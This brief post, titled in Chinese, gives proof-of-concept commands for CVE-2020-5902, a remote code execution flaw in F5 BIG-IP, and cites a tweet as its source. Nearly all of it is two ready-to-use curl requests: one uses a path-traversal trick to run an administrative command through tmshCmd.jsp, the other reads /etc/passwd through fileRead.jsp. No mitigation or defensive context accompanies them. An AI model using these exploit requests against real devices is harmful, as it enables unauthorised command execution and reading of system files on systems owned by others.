CVE-2020-5902 F5 BIG-IP 远程代码执行RCE

cve-2020-5902 :

 

RCE:
curl -v -k ‘//[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin’

 

Read File:
curl -v -k ‘//[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd’

 

 

 

  

原文地址:
//twitter.com/x4ce/status/1279790599793545216